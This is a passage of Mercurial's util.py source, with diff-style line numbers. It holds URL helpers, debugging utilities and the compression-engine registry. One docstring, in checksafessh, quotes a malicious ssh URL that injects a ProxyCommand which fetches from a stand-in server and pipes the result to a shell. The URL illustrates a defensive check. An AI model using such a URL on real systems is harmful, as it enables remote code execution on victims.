3062 3083 path = self.path or '/'
3063 3084 # For Windows, we need to promote hosts containing drive
3064 3085 # letters to paths with drive letters.
3065 3086 if hasdriveletter(self._hostport):
3066 3087 path = self._hostport + '/' + self.path
3067 3088 elif (self.host is not None and self.path
3068 3089 and not hasdriveletter(path)):
3069 3090 path = '/' + path
3070 3091 return path
3071 3092 return self._origpath
3072 3093
3073 3094 def islocal(self):
3074 3095 '''whether localpath will return something that posixfile can open'''
3075 3096 return (not self.scheme or self.scheme == 'file'
3076 3097 or self.scheme == 'bundle')
3077 3098
3078 3099 def hasscheme(path):
3079 3100 return bool(url(path).scheme)
3080 3101
3081 3102 def hasdriveletter(path):
3082 3103 return path and path[1:2] == ':' and path[0:1].isalpha()
3083 3104
3084 3105 def urllocalpath(path):
3085 3106 return url(path, parsequery=False, parsefragment=False).localpath()
3086 3107
3087 3108 def checksafessh(path):
3088 3109 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3089 3110
3090 3111 This is a sanity check for ssh urls. ssh will parse the first item as
3091 3112 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3092 3113 Let's block these potentially exploitable urls entirely and warn the
3093 3114 user.
3094 3115
3095 3116 Raises an error.Abort when the url is unsafe.
3096 3117 """
3097 3118 path = urlreq.unquote(path)
3098 3119 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3099 3120 raise error.Abort(_('potentially unsafe url: %r') %
3100 3121 (pycompat.bytestr(path),))
3101 3122
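# Illustrative sketch (not part of the original file):
#
#   checksafessh(b'ssh://example.com/repo')   # fine, returns None
#   checksafessh(b'ssh://-oProxyCommand=x/')  # raises error.Abort (SEC)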
3102 3123 def hidepassword(u):
3103 3124 '''hide user credential in a url string'''
3104 3125 u = url(u)
3105 3126 if u.passwd:
3106 3127 u.passwd = '***'
3107 3128 return bytes(u)
3108 3129
3109 3130 def removeauth(u):
3110 3131 '''remove all authentication information from a url string'''
3111 3132 u = url(u)
3112 3133 u.user = u.passwd = None
3113 3134 return str(u)
3114 3135
3115 3136 timecount = unitcountfn(
3116 3137 (1, 1e3, _('%.0f s')),
3117 3138 (100, 1, _('%.1f s')),
3118 3139 (10, 1, _('%.2f s')),
3119 3140 (1, 1, _('%.3f s')),
3120 3141 (100, 0.001, _('%.1f ms')),
3121 3142 (10, 0.001, _('%.2f ms')),
3122 3143 (1, 0.001, _('%.3f ms')),
3123 3144 (100, 0.000001, _('%.1f us')),
3124 3145 (10, 0.000001, _('%.2f us')),
3125 3146 (1, 0.000001, _('%.3f us')),
3126 3147 (100, 0.000000001, _('%.1f ns')),
3127 3148 (10, 0.000000001, _('%.2f ns')),
3128 3149 (1, 0.000000001, _('%.3f ns')),
3129 3150 )
3130 3151
3131 3152 _timenesting = [0]
3132 3153
3133 3154 def timed(func):
3134 3155 '''Report the execution time of a function call to stderr.
3135 3156
3136 3157 During development, use as a decorator when you need to measure
3137 3158 the cost of a function, e.g. as follows:
3138 3159
3139 3160 @util.timed
3140 3161 def foo(a, b, c):
3141 3162 pass
3142 3163 '''
3143 3164
3144 3165 def wrapper(*args, **kwargs):
3145 3166 start = timer()
3146 3167 indent = 2
3147 3168 _timenesting[0] += indent
3148 3169 try:
3149 3170 return func(*args, **kwargs)
3150 3171 finally:
3151 3172 elapsed = timer() - start
3152 3173 _timenesting[0] -= indent
3153 3174 stderr.write('%s%s: %s\n' %
3154 3175 (' ' * _timenesting[0], func.__name__,
3155 3176 timecount(elapsed)))
3156 3177 return wrapper
3157 3178
3158 3179 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3159 3180 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3160 3181
3161 3182 def sizetoint(s):
3162 3183 '''Convert a space specifier to a byte count.
3163 3184
3164 3185 >>> sizetoint(b'30')
3165 3186 30
3166 3187 >>> sizetoint(b'2.2kb')
3167 3188 2252
3168 3189 >>> sizetoint(b'6M')
3169 3190 6291456
3170 3191 '''
3171 3192 t = s.strip().lower()
3172 3193 try:
3173 3194 for k, u in _sizeunits:
3174 3195 if t.endswith(k):
3175 3196 return int(float(t[:-len(k)]) * u)
3176 3197 return int(t)
3177 3198 except ValueError:
3178 3199 raise error.ParseError(_("couldn't parse size: %s") % s)
3179 3200
3180 3201 class hooks(object):
3181 3202 '''A collection of hook functions that can be used to extend a
3182 3203 function's behavior. Hooks are called in lexicographic order,
3183 3204 based on the names of their sources.'''
3184 3205
3185 3206 def __init__(self):
3186 3207 self._hooks = []
3187 3208
3188 3209 def add(self, source, hook):
3189 3210 self._hooks.append((source, hook))
3190 3211
3191 3212 def __call__(self, *args):
3192 3213 self._hooks.sort(key=lambda x: x[0])
3193 3214 results = []
3194 3215 for source, hook in self._hooks:
3195 3216 results.append(hook(*args))
3196 3217 return results
3197 3218
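# Illustrative sketch (not part of the original file): hooks run in
# lexicographic order of their source names, not registration order.
def _hooksdemo():
    h = hooks()
    h.add(b'b-ext', lambda v: v * 2)
    h.add(b'a-ext', lambda v: v + 1)
    assert h(3) == [4, 6]  # 'a-ext' sorts before 'b-ext'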
3198 3219 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3199 3220 '''Yields lines for a nicely formatted stacktrace.
3200 3221 Skips the 'skip' last entries, then returns the last 'depth' entries.
3201 3222 Each file+linenumber is formatted according to fileline.
3202 3223 Each line is formatted according to line.
3203 3224 If line is None, it yields:
3204 3225 length of longest filepath+line number,
3205 3226 filepath+linenumber,
3206 3227 function
3207 3228
3208 3229 Not to be used in production code, but very convenient while developing.
3209 3230 '''
3210 3231 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3211 3232 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3212 3233 ][-depth:]
3213 3234 if entries:
3214 3235 fnmax = max(len(entry[0]) for entry in entries)
3215 3236 for fnln, func in entries:
3216 3237 if line is None:
3217 3238 yield (fnmax, fnln, func)
3218 3239 else:
3219 3240 yield line % (fnmax, fnln, func)
3220 3241
3221 3242 def debugstacktrace(msg='stacktrace', skip=0,
3222 3243 f=stderr, otherf=stdout, depth=0):
3223 3244 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3224 3245 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3225 3246 By default it will flush stdout first.
3226 3247 It can be used everywhere and intentionally does not require an ui object.
3227 3248 Not be used in production code but very convenient while developing.
3228 3249 '''
3229 3250 if otherf:
3230 3251 otherf.flush()
3231 3252 f.write('%s at:\n' % msg.rstrip())
3232 3253 for line in getstackframes(skip + 1, depth=depth):
3233 3254 f.write(line)
3234 3255 f.flush()
3235 3256
3236 3257 class dirs(object):
3237 3258 '''a multiset of directory names from a dirstate or manifest'''
3238 3259
3239 3260 def __init__(self, map, skip=None):
3240 3261 self._dirs = {}
3241 3262 addpath = self.addpath
3242 3263 if safehasattr(map, 'iteritems') and skip is not None:
3243 3264 for f, s in map.iteritems():
3244 3265 if s[0] != skip:
3245 3266 addpath(f)
3246 3267 else:
3247 3268 for f in map:
3248 3269 addpath(f)
3249 3270
3250 3271 def addpath(self, path):
3251 3272 dirs = self._dirs
3252 3273 for base in finddirs(path):
3253 3274 if base in dirs:
3254 3275 dirs[base] += 1
3255 3276 return
3256 3277 dirs[base] = 1
3257 3278
3258 3279 def delpath(self, path):
3259 3280 dirs = self._dirs
3260 3281 for base in finddirs(path):
3261 3282 if dirs[base] > 1:
3262 3283 dirs[base] -= 1
3263 3284 return
3264 3285 del dirs[base]
3265 3286
3266 3287 def __iter__(self):
3267 3288 return iter(self._dirs)
3268 3289
3269 3290 def __contains__(self, d):
3270 3291 return d in self._dirs
3271 3292
3272 3293 if safehasattr(parsers, 'dirs'):
3273 3294 dirs = parsers.dirs
3274 3295
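# Illustrative sketch (not part of the original file): dirs records every
# ancestor directory of the given paths with multiset counts, so delpath()
# only forgets a directory once no remaining path uses it.
def _dirsdemo():
    d = dirs([b'a/b/c', b'a/d'])
    assert b'a' in d          # ancestor of both paths (count == 2)
    assert b'a/b' in d
    assert b'a/b/c' not in d  # the paths themselves are not recorded
    d.delpath(b'a/d')
    assert b'a' in d          # still referenced by 'a/b/c'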
3275 3296 def finddirs(path):
3276 3297 pos = path.rfind('/')
3277 3298 while pos != -1:
3278 3299 yield path[:pos]
3279 3300 pos = path.rfind('/', 0, pos)
3280 3301
3281 3302 # compression code
3282 3303
3283 3304 SERVERROLE = 'server'
3284 3305 CLIENTROLE = 'client'
3285 3306
3286 3307 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3287 3308 (u'name', u'serverpriority',
3288 3309 u'clientpriority'))
3289 3310
3290 3311 class compressormanager(object):
3291 3312 """Holds registrations of various compression engines.
3292 3313
3293 3314 This class essentially abstracts the differences between compression
3294 3315 engines to allow new compression formats to be added easily, possibly from
3295 3316 extensions.
3296 3317
3297 3318 Compressors are registered against the global instance by calling its
3298 3319 ``register()`` method.
3299 3320 """
3300 3321 def __init__(self):
3301 3322 self._engines = {}
3302 3323 # Bundle spec human name to engine name.
3303 3324 self._bundlenames = {}
3304 3325 # Internal bundle identifier to engine name.
3305 3326 self._bundletypes = {}
3306 3327 # Revlog header to engine name.
3307 3328 self._revlogheaders = {}
3308 3329 # Wire proto identifier to engine name.
3309 3330 self._wiretypes = {}
3310 3331
3311 3332 def __getitem__(self, key):
3312 3333 return self._engines[key]
3313 3334
3314 3335 def __contains__(self, key):
3315 3336 return key in self._engines
3316 3337
3317 3338 def __iter__(self):
3318 3339 return iter(self._engines.keys())
3319 3340
3320 3341 def register(self, engine):
3321 3342 """Register a compression engine with the manager.
3322 3343
3323 3344 The argument must be a ``compressionengine`` instance.
3324 3345 """
3325 3346 if not isinstance(engine, compressionengine):
3326 3347 raise ValueError(_('argument must be a compressionengine'))
3327 3348
3328 3349 name = engine.name()
3329 3350
3330 3351 if name in self._engines:
3331 3352 raise error.Abort(_('compression engine %s already registered') %
3332 3353 name)
3333 3354
3334 3355 bundleinfo = engine.bundletype()
3335 3356 if bundleinfo:
3336 3357 bundlename, bundletype = bundleinfo
3337 3358
3338 3359 if bundlename in self._bundlenames:
3339 3360 raise error.Abort(_('bundle name %s already registered') %
3340 3361 bundlename)
3341 3362 if bundletype in self._bundletypes:
3342 3363 raise error.Abort(_('bundle type %s already registered by %s') %
3343 3364 (bundletype, self._bundletypes[bundletype]))
3344 3365
3345 3366 # The engine may declare no external facing name; register it only if set.
3346 3367 if bundlename:
3347 3368 self._bundlenames[bundlename] = name
3348 3369
3349 3370 self._bundletypes[bundletype] = name
3350 3371
3351 3372 wiresupport = engine.wireprotosupport()
3352 3373 if wiresupport:
3353 3374 wiretype = wiresupport.name
3354 3375 if wiretype in self._wiretypes:
3355 3376 raise error.Abort(_('wire protocol compression %s already '
3356 3377 'registered by %s') %
3357 3378 (wiretype, self._wiretypes[wiretype]))
3358 3379
3359 3380 self._wiretypes[wiretype] = name
3360 3381
3361 3382 revlogheader = engine.revlogheader()
3362 3383 if revlogheader and revlogheader in self._revlogheaders:
3363 3384 raise error.Abort(_('revlog header %s already registered by %s') %
3364 3385 (revlogheader, self._revlogheaders[revlogheader]))
3365 3386
3366 3387 if revlogheader:
3367 3388 self._revlogheaders[revlogheader] = name
3368 3389
3369 3390 self._engines[name] = engine
3370 3391
3371 3392 @property
3372 3393 def supportedbundlenames(self):
3373 3394 return set(self._bundlenames.keys())
3374 3395
3375 3396 @property
3376 3397 def supportedbundletypes(self):
3377 3398 return set(self._bundletypes.keys())
3378 3399
3379 3400 def forbundlename(self, bundlename):
3380 3401 """Obtain a compression engine registered to a bundle name.
3381 3402
3382 3403 Will raise KeyError if the bundle type isn't registered.
3383 3404
3384 3405 Will abort if the engine is known but not available.
3385 3406 """
3386 3407 engine = self._engines[self._bundlenames[bundlename]]
3387 3408 if not engine.available():
3388 3409 raise error.Abort(_('compression engine %s could not be loaded') %
3389 3410 engine.name())
3390 3411 return engine
3391 3412
3392 3413 def forbundletype(self, bundletype):
3393 3414 """Obtain a compression engine registered to a bundle type.
3394 3415
3395 3416 Will raise KeyError if the bundle type isn't registered.
3396 3417
3397 3418 Will abort if the engine is known but not available.
3398 3419 """
3399 3420 engine = self._engines[self._bundletypes[bundletype]]
3400 3421 if not engine.available():
3401 3422 raise error.Abort(_('compression engine %s could not be loaded') %
3402 3423 engine.name())
3403 3424 return engine
3404 3425
3405 3426 def supportedwireengines(self, role, onlyavailable=True):
3406 3427 """Obtain compression engines that support the wire protocol.
3407 3428
3408 3429 Returns a list of engines in prioritized order, most desired first.
3409 3430
3410 3431 If ``onlyavailable`` is set, filter out engines that can't be
3411 3432 loaded.
3412 3433 """
3413 3434 assert role in (SERVERROLE, CLIENTROLE)
3414 3435
3415 3436 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3416 3437
3417 3438 engines = [self._engines[e] for e in self._wiretypes.values()]
3418 3439 if onlyavailable:
3419 3440 engines = [e for e in engines if e.available()]
3420 3441
3421 3442 def getkey(e):
3422 3443 # Sort first by priority, highest first. In case of tie, sort
3423 3444 # alphabetically. This is arbitrary, but ensures output is
3424 3445 # stable.
3425 3446 w = e.wireprotosupport()
3426 3447 return -1 * getattr(w, attr), w.name
3427 3448
3428 3449 return list(sorted(engines, key=getkey))
3429 3450
3430 3451 def forwiretype(self, wiretype):
3431 3452 engine = self._engines[self._wiretypes[wiretype]]
3432 3453 if not engine.available():
3433 3454 raise error.Abort(_('compression engine %s could not be loaded') %
3434 3455 engine.name())
3435 3456 return engine
3436 3457
3437 3458 def forrevlogheader(self, header):
3438 3459 """Obtain a compression engine registered to a revlog header.
3439 3460
3440 3461 Will raise KeyError if the revlog header value isn't registered.
3441 3462 """
3442 3463 return self._engines[self._revlogheaders[header]]
3443 3464
3444 3465 compengines = compressormanager()
3445 3466
3446 3467 class compressionengine(object):
3447 3468 """Base class for compression engines.
3448 3469
3449 3470 Compression engines must implement the interface defined by this class.
3450 3471 """
3451 3472 def name(self):
3452 3473 """Returns the name of the compression engine.
3453 3474
3454 3475 This is the key the engine is registered under.
3455 3476
3456 3477 This method must be implemented.
3457 3478 """
3458 3479 raise NotImplementedError()
3459 3480
3460 3481 def available(self):
3461 3482 """Whether the compression engine is available.
3462 3483
3463 3484 The intent of this method is to allow optional compression engines
3464 3485 that may not be available in all installations (such as engines relying
3465 3486 on C extensions that may not be present).
3466 3487 """
3467 3488 return True
3468 3489
3469 3490 def bundletype(self):
3470 3491 """Describes bundle identifiers for this engine.
3471 3492
3472 3493 If this compression engine isn't supported for bundles, returns None.
3473 3494
3474 3495 If this engine can be used for bundles, returns a 2-tuple of strings of
3475 3496 the user-facing "bundle spec" compression name and an internal
3476 3497 identifier used to denote the compression format within bundles. To
3477 3498 exclude the name from external usage, set the first element to ``None``.
3478 3499
3479 3500 If bundle compression is supported, the class must also implement
3480 3501 ``compressstream`` and ``decompressorreader``.
3481 3502
3482 3503 The docstring of this method is used in the help system to tell users
3483 3504 about this engine.
3484 3505 """
3485 3506 return None
3486 3507
3487 3508 def wireprotosupport(self):
3488 3509 """Declare support for this compression format on the wire protocol.
3489 3510
3490 3511 If this compression engine isn't supported for compressing wire
3491 3512 protocol payloads, returns None.
3492 3513
3493 3514 Otherwise, returns ``compenginewireprotosupport`` with the following
3494 3515 fields:
3495 3516
3496 3517 * String format identifier
3497 3518 * Integer priority for the server
3498 3519 * Integer priority for the client
3499 3520
3500 3521 The integer priorities are used to order the advertisement of format
3501 3522 support by server and client. The highest integer is advertised
3502 3523 first. Integers with non-positive values aren't advertised.
3503 3524
3504 3525 The priority values are somewhat arbitrary and only used for default
3505 3526 ordering. The relative order can be changed via config options.
3506 3527
3507 3528 If wire protocol compression is supported, the class must also implement
3508 3529 ``compressstream`` and ``decompressorreader``.
3509 3530 """
3510 3531 return None
3511 3532
3512 3533 def revlogheader(self):
3513 3534 """Header added to revlog chunks that identifies this engine.
3514 3535
3515 3536 If this engine can be used to compress revlogs, this method should
3516 3537 return the bytes used to identify chunks compressed with this engine.
3517 3538 Else, the method should return ``None`` to indicate it does not
3518 3539 participate in revlog compression.
3519 3540 """
3520 3541 return None
3521 3542
3522 3543 def compressstream(self, it, opts=None):
3523 3544 """Compress an iterator of chunks.
3524 3545
3525 3546 The method receives an iterator (ideally a generator) of chunks of
3526 3547 bytes to be compressed. It returns an iterator (ideally a generator)
3527 3548 of bytes of chunks representing the compressed output.
3528 3549
3529 3550 Optionally accepts an argument defining how to perform compression.
3530 3551 Each engine treats this argument differently.
3531 3552 """
3532 3553 raise NotImplementedError()
3533 3554
3534 3555 def decompressorreader(self, fh):
3535 3556 """Perform decompression on a file object.
3536 3557
3537 3558 Argument is an object with a ``read(size)`` method that returns
3538 3559 compressed data. Return value is an object with a ``read(size)`` that
3539 3560 returns uncompressed data.
3540 3561 """
3541 3562 raise NotImplementedError()
3542 3563
3543 3564 def revlogcompressor(self, opts=None):
3544 3565 """Obtain an object that can be used to compress revlog entries.
3545 3566
3546 3567 The object has a ``compress(data)`` method that compresses binary
3547 3568 data. This method returns compressed binary data or ``None`` if
3548 3569 the data could not be compressed (too small, not compressible, etc).
3549 3570 The returned data should have a header uniquely identifying this
3550 3571 compression format so decompression can be routed to this engine.
3551 3572 This header should be identified by the ``revlogheader()`` return
3552 3573 value.
3553 3574
3554 3575 The object has a ``decompress(data)`` method that decompresses
3555 3576 data. The method will only be called if ``data`` begins with
3556 3577 ``revlogheader()``. The method should return the raw, uncompressed
3557 3578 data or raise a ``RevlogError``.
3558 3579
3559 3580 The object is reusable but is not thread safe.
3560 3581 """
3561 3582 raise NotImplementedError()
3562 3583
3563 3584 class _zlibengine(compressionengine):
3564 3585 def name(self):
3565 3586 return 'zlib'
3566 3587
3567 3588 def bundletype(self):
3568 3589 """zlib compression using the DEFLATE algorithm.
3569 3590
3570 3591 All Mercurial clients should support this format. The compression
3571 3592 algorithm strikes a reasonable balance between compression ratio
3572 3593 and size.
3573 3594 """
3574 3595 return 'gzip', 'GZ'
3575 3596
3576 3597 def wireprotosupport(self):
3577 3598 return compewireprotosupport('zlib', 20, 20)
3578 3599
3579 3600 def revlogheader(self):
3580 3601 return 'x'
3581 3602
3582 3603 def compressstream(self, it, opts=None):
3583 3604 opts = opts or {}
3584 3605
3585 3606 z = zlib.compressobj(opts.get('level', -1))
3586 3607 for chunk in it:
3587 3608 data = z.compress(chunk)
3588 3609 # Not all calls to compress emit data. It is cheaper to inspect
3589 3610 # here than to feed empty chunks through generator.
3590 3611 if data:
3591 3612 yield data
3592 3613
3593 3614 yield z.flush()
3594 3615
3595 3616 def decompressorreader(self, fh):
3596 3617 def gen():
3597 3618 d = zlib.decompressobj()
3598 3619 for chunk in filechunkiter(fh):
3599 3620 while chunk:
3600 3621 # Limit output size to limit memory.
3601 3622 yield d.decompress(chunk, 2 ** 18)
3602 3623 chunk = d.unconsumed_tail
3603 3624
3604 3625 return chunkbuffer(gen())
3605 3626
3606 3627 class zlibrevlogcompressor(object):
3607 3628 def compress(self, data):
3608 3629 insize = len(data)
3609 3630 # Caller handles empty input case.
3610 3631 assert insize > 0
3611 3632
3612 3633 if insize < 44:
3613 3634 return None
3614 3635
3615 3636 elif insize <= 1000000:
3616 3637 compressed = zlib.compress(data)
3617 3638 if len(compressed) < insize:
3618 3639 return compressed
3619 3640 return None
3620 3641
3621 3642 # zlib makes an internal copy of the input buffer, doubling
3622 3643 # memory usage for large inputs. So do streaming compression
3623 3644 # on large inputs.
3624 3645 else:
3625 3646 z = zlib.compressobj()
3626 3647 parts = []
3627 3648 pos = 0
3628 3649 while pos < insize:
3629 3650 pos2 = pos + 2**20
3630 3651 parts.append(z.compress(data[pos:pos2]))
3631 3652 pos = pos2
3632 3653 parts.append(z.flush())
3633 3654
3634 3655 if sum(map(len, parts)) < insize:
3635 3656 return ''.join(parts)
3636 3657 return None
3637 3658
3638 3659 def decompress(self, data):
3639 3660 try:
3640 3661 return zlib.decompress(data)
3641 3662 except zlib.error as e:
3642 3663 raise error.RevlogError(_('revlog decompress error: %s') %
3643 3664 forcebytestr(e))
3644 3665
3645 3666 def revlogcompressor(self, opts=None):
3646 3667 return self.zlibrevlogcompressor()
3647 3668
3648 3669 compengines.register(_zlibengine())
3649 3670
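# A hedged usage sketch of the engine API: round-trip a payload through
# ``compressstream`` and ``decompressorreader`` via the registry
# (``stringio`` stands in for a real file object here):
#
#     engine = compengines['zlib']
#     blob = b''.join(engine.compressstream(iter([b'chunk'] * 100)))
#     reader = engine.decompressorreader(stringio(blob))
#     assert reader.read(5) == b'chunk'
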
3650 3671 class _bz2engine(compressionengine):
3651 3672 def name(self):
3652 3673 return 'bz2'
3653 3674
3654 3675 def bundletype(self):
3655 3676 """An algorithm that produces smaller bundles than ``gzip``.
3656 3677
3657 3678 All Mercurial clients should support this format.
3658 3679
3659 3680 This engine will likely produce smaller bundles than ``gzip`` but
3660 3681 will be significantly slower, both during compression and
3661 3682 decompression.
3662 3683
3663 3684 If available, the ``zstd`` engine can yield similar or better
3664 3685 compression at much higher speeds.
3665 3686 """
3666 3687 return 'bzip2', 'BZ'
3667 3688
3668 3689 # We declare a protocol name but don't advertise by default because
3669 3690 # it is slow.
3670 3691 def wireprotosupport(self):
3671 3692 return compewireprotosupport('bzip2', 0, 0)
3672 3693
3673 3694 def compressstream(self, it, opts=None):
3674 3695 opts = opts or {}
3675 3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3676 3697 for chunk in it:
3677 3698 data = z.compress(chunk)
3678 3699 if data:
3679 3700 yield data
3680 3701
3681 3702 yield z.flush()
3682 3703
3683 3704 def decompressorreader(self, fh):
3684 3705 def gen():
3685 3706 d = bz2.BZ2Decompressor()
3686 3707 for chunk in filechunkiter(fh):
3687 3708 yield d.decompress(chunk)
3688 3709
3689 3710 return chunkbuffer(gen())
3690 3711
3691 3712 compengines.register(_bz2engine())
3692 3713
3693 3714 class _truncatedbz2engine(compressionengine):
3694 3715 def name(self):
3695 3716 return 'bz2truncated'
3696 3717
3697 3718 def bundletype(self):
3698 3719 return None, '_truncatedBZ'
3699 3720
3700 3721 # We don't implement compressstream because it is hackily handled elsewhere.
3701 3722
3702 3723 def decompressorreader(self, fh):
3703 3724 def gen():
3704 3725 # The input stream doesn't have the 'BZ' header. So add it back.
3705 3726 d = bz2.BZ2Decompressor()
3706 3727 d.decompress('BZ')
3707 3728 for chunk in filechunkiter(fh):
3708 3729 yield d.decompress(chunk)
3709 3730
3710 3731 return chunkbuffer(gen())
3711 3732
3712 3733 compengines.register(_truncatedbz2engine())
3713 3734
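# The header-priming trick above, sketched against the stdlib directly
# (illustrative only): feeding 'BZ' first lets the decompressor accept a
# stream whose magic bytes were stripped.
#
#     import bz2
#     payload = bz2.compress(b'data')[2:]   # drop the leading 'BZ'
#     d = bz2.BZ2Decompressor()
#     d.decompress(b'BZ')                   # restore the stripped header
#     assert d.decompress(payload) == b'data'
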
3714 3735 class _noopengine(compressionengine):
3715 3736 def name(self):
3716 3737 return 'none'
3717 3738
3718 3739 def bundletype(self):
3719 3740 """No compression is performed.
3720 3741
3721 3742 Use this compression engine to explicitly disable compression.
3722 3743 """
3723 3744 return 'none', 'UN'
3724 3745
3725 3746 # Clients always support uncompressed payloads. Servers don't advertise
3726 3747 # it by default because, unless you are on a fast network, uncompressed
3727 3748 # payloads can easily saturate the network pipe.
3728 3749 def wireprotosupport(self):
3729 3750 return compewireprotosupport('none', 0, 10)
3730 3751
3731 3752 # We don't implement revlogheader because it is handled specially
3732 3753 # in the revlog class.
3733 3754
3734 3755 def compressstream(self, it, opts=None):
3735 3756 return it
3736 3757
3737 3758 def decompressorreader(self, fh):
3738 3759 return fh
3739 3760
3740 3761 class nooprevlogcompressor(object):
3741 3762 def compress(self, data):
3742 3763 return None
3743 3764
3744 3765 def revlogcompressor(self, opts=None):
3745 3766 return self.nooprevlogcompressor()
3746 3767
3747 3768 compengines.register(_noopengine())
3748 3769
3749 3770 class _zstdengine(compressionengine):
3750 3771 def name(self):
3751 3772 return 'zstd'
3752 3773
3753 3774 @propertycache
3754 3775 def _module(self):
3755 3776 # Not all installs have the zstd module available. So defer importing
3756 3777 # until first access.
3757 3778 try:
3758 3779 from . import zstd
3759 3780 # Force delayed import.
3760 3781 zstd.__version__
3761 3782 return zstd
3762 3783 except ImportError:
3763 3784 return None
3764 3785
3765 3786 def available(self):
3766 3787 return bool(self._module)
3767 3788
3768 3789 def bundletype(self):
3769 3790 """A modern compression algorithm that is fast and highly flexible.
3770 3791
3771 3792 Only supported by Mercurial 4.1 and newer clients.
3772 3793
3773 3794 With the default settings, zstd compression is both faster and yields
3774 3795 better compression than ``gzip``. It also frequently yields better
3775 3796 compression than ``bzip2`` while operating at much higher speeds.
3776 3797
3777 3798 If this engine is available and backwards compatibility is not a
3778 3799 concern, it is likely the best available engine.
3779 3800 """
3780 3801 return 'zstd', 'ZS'
3781 3802
3782 3803 def wireprotosupport(self):
3783 3804 return compewireprotosupport('zstd', 50, 50)
3784 3805
3785 3806 def revlogheader(self):
3786 3807 return '\x28'
3787 3808
3788 3809 def compressstream(self, it, opts=None):
3789 3810 opts = opts or {}
3790 3811 # zstd level 3 is almost always significantly faster than zlib
3791 3812 # while providing no worse compression. It strikes a good balance
3792 3813 # between speed and compression.
3793 3814 level = opts.get('level', 3)
3794 3815
3795 3816 zstd = self._module
3796 3817 z = zstd.ZstdCompressor(level=level).compressobj()
3797 3818 for chunk in it:
3798 3819 data = z.compress(chunk)
3799 3820 if data:
3800 3821 yield data
3801 3822
3802 3823 yield z.flush()
3803 3824
3804 3825 def decompressorreader(self, fh):
3805 3826 zstd = self._module
3806 3827 dctx = zstd.ZstdDecompressor()
3807 3828 return chunkbuffer(dctx.read_from(fh))
3808 3829
3809 3830 class zstdrevlogcompressor(object):
3810 3831 def __init__(self, zstd, level=3):
3811 3832 # Writing the content size adds a few bytes to the output. However,
3812 3833 # it makes decompression more efficient, since we can
3813 3834 # pre-allocate a buffer to hold the result.
3814 3835 self._cctx = zstd.ZstdCompressor(level=level,
3815 3836 write_content_size=True)
3816 3837 self._dctx = zstd.ZstdDecompressor()
3817 3838 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3818 3839 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3819 3840
3820 3841 def compress(self, data):
3821 3842 insize = len(data)
3822 3843 # Caller handles empty input case.
3823 3844 assert insize > 0
3824 3845
3825 3846 if insize < 50:
3826 3847 return None
3827 3848
3828 3849 elif insize <= 1000000:
3829 3850 compressed = self._cctx.compress(data)
3830 3851 if len(compressed) < insize:
3831 3852 return compressed
3832 3853 return None
3833 3854 else:
3834 3855 z = self._cctx.compressobj()
3835 3856 chunks = []
3836 3857 pos = 0
3837 3858 while pos < insize:
3838 3859 pos2 = pos + self._compinsize
3839 3860 chunk = z.compress(data[pos:pos2])
3840 3861 if chunk:
3841 3862 chunks.append(chunk)
3842 3863 pos = pos2
3843 3864 chunks.append(z.flush())
3844 3865
3845 3866 if sum(map(len, chunks)) < insize:
3846 3867 return ''.join(chunks)
3847 3868 return None
3848 3869
3849 3870 def decompress(self, data):
3850 3871 insize = len(data)
3851 3872
3852 3873 try:
3853 3874 # This was measured to be faster than other streaming
3854 3875 # decompressors.
3855 3876 dobj = self._dctx.decompressobj()
3856 3877 chunks = []
3857 3878 pos = 0
3858 3879 while pos < insize:
3859 3880 pos2 = pos + self._decompinsize
3860 3881 chunk = dobj.decompress(data[pos:pos2])
3861 3882 if chunk:
3862 3883 chunks.append(chunk)
3863 3884 pos = pos2
3864 3885 # Frame should be exhausted, so no finish() API.
3865 3886
3866 3887 return ''.join(chunks)
3867 3888 except Exception as e:
3868 3889 raise error.RevlogError(_('revlog decompress error: %s') %
3869 3890 forcebytestr(e))
3870 3891
3871 3892 def revlogcompressor(self, opts=None):
3872 3893 opts = opts or {}
3873 3894 return self.zstdrevlogcompressor(self._module,
3874 3895 level=opts.get('level', 3))
3875 3896
3876 3897 compengines.register(_zstdengine())
3877 3898
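# A hedged sketch of how per-call options reach an engine: each engine
# interprets ``opts`` itself, and zstd reads 'level' (default 3) in both
# compressstream() and revlogcompressor().
#
#     engine = compengines['zstd']
#     if engine.available():
#         out = b''.join(engine.compressstream(iter([b'payload']),
#                                              {'level': 10}))
#         compressor = engine.revlogcompressor({'level': 10})
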
3878 3899 def bundlecompressiontopics():
3879 3900 """Obtains a list of available bundle compressions for use in help."""
3880 3901 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3881 3902 items = {}
3882 3903
3883 3904 # We need to format the docstring. So use a dummy object/type to hold it
3884 3905 # rather than mutating the original.
3885 3906 class docobject(object):
3886 3907 pass
3887 3908
3888 3909 for name in compengines:
3889 3910 engine = compengines[name]
3890 3911
3891 3912 if not engine.available():
3892 3913 continue
3893 3914
3894 3915 bt = engine.bundletype()
3895 3916 if not bt or not bt[0]:
3896 3917 continue
3897 3918
3898 3919 doc = pycompat.sysstr('``%s``\n %s') % (
3899 3920 bt[0], engine.bundletype.__doc__)
3900 3921
3901 3922 value = docobject()
3902 3923 value.__doc__ = doc
3903 3924 value._origdoc = engine.bundletype.__doc__
3904 3925 value._origfunc = engine.bundletype
3905 3926
3906 3927 items[bt[0]] = value
3907 3928
3908 3929 return items
3909 3930
3910 3931 i18nfunctions = bundlecompressiontopics().values()
3911 3932
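# A small illustrative sketch of consuming the mapping above, e.g. when
# rendering help text:
#
#     for name, doc in sorted(bundlecompressiontopics().items()):
#         print('%s:\n%s' % (name, doc.__doc__))
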
3912 3933 # convenient shortcut
3913 3934 dst = debugstacktrace
3914 3935
3915 3936 def safename(f, tag, ctx, others=None):
3916 3937 """
3917 3938 Generate a name that is safe to rename f to in the given context.
3918 3939
